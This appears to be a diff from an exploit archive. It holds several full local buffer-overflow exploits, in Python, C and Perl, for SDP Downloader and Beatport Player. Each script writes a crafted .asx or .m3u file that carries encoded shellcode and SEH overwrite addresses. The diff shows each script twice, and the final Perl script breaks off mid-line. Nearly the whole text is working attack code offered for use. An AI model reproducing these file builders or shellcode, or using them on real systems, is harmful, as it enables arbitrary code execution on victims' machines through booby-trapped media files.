"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";
my $exploit = $header.$junk.$eip.$nopsleds.$sc;
$file = "zAx.lst";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-03-19]

132
platforms/windows/local/8536.py
View file

@ -1,66 +1,66 @@
#usage: exploit.py
#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm)
# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time.
print "**************************************************************************"
print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n"
print " Founder: Cyber-Zone"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f")
header2 = (
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
"\x3E\x3C\x2F\x41\x53\x58\x3E" )
buff = "\x41" * 529
next_seh= "\x74\x06\x90\x90"
seh="\x89\x69\x01\x10" #idmmbc.dll
#seh = "\x43"*4
junk="\x44"*50000
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x56\x43\x36\x42\x30\x5a")
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
try:
out_file = open("exploit.asx",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-04-27]
#usage: exploit.py
#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm)
# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time.
print "**************************************************************************"
print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n"
print " Founder: Cyber-Zone"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f")
header2 = (
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
"\x3E\x3C\x2F\x41\x53\x58\x3E" )
buff = "\x41" * 529
next_seh= "\x74\x06\x90\x90"
seh="\x89\x69\x01\x10" #idmmbc.dll
#seh = "\x43"*4
junk="\x44"*50000
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x56\x43\x36\x42\x30\x5a")
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
try:
out_file = open("exploit.asx",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-04-27]

172
platforms/windows/local/8540.c
View file

@ -1,86 +1,86 @@
/* SDP-BOF.c
* SDP Downloader Local Buffer overflow exploit [SEH]
* Credits : Cyber-Zone
* Exploit BY :
* SimO-s0fT (maroc-anti-connexion@hotmail.com)
* Shoot to : Stack & r1z & Str0ke
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 529
#define NOP 0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a";
int main(int argc, char *argv[]){
FILE *p;
unsigned char *buffer;
int n_seh=0x909010eb;
int seh=0x7C87DE34;
int i=0;
if(argc!=2){
fprintf(stdout,"_______________________________________________________________________\n");
fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
printf("\tUSAGE : %s filename.asx\n",argv[0]);
fprintf(stdout,"_________________________________________________________________________\n");
}
if((p=fopen(argv[1],"w+b"))==NULL){
perror("error");
return EXIT_FAILURE;
}
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);
fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}
// milw0rm.com [2009-04-27]
/* SDP-BOF.c
* SDP Downloader Local Buffer overflow exploit [SEH]
* Credits : Cyber-Zone
* Exploit BY :
* SimO-s0fT (maroc-anti-connexion@hotmail.com)
* Shoot to : Stack & r1z & Str0ke
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 529
#define NOP 0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a";
int main(int argc, char *argv[]){
FILE *p;
unsigned char *buffer;
int n_seh=0x909010eb;
int seh=0x7C87DE34;
int i=0;
if(argc!=2){
fprintf(stdout,"_______________________________________________________________________\n");
fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
printf("\tUSAGE : %s filename.asx\n",argv[0]);
fprintf(stdout,"_________________________________________________________________________\n");
}
if((p=fopen(argv[1],"w+b"))==NULL){
perror("error");
return EXIT_FAILURE;
}
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);
fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}
// milw0rm.com [2009-04-27]

78
platforms/windows/local/8590.py
View file

@ -1,39 +1,39 @@
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
exploit = buff + next_seh + seh + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-05-01]
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73"
"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f"
"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b"
"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
exploit = buff + next_seh + seh + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-05-01]

98
platforms/windows/local/8591.py
View file

@ -1,49 +1,49 @@
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58"
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a")
file=open('Devil_inside.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()
# milw0rm.com [2009-05-01]
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58"
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a")
file=open('Devil_inside.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()
# milw0rm.com [2009-05-01]

58
platforms/windows/local/8592.pl
View file

@ -1,29 +1,29 @@
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
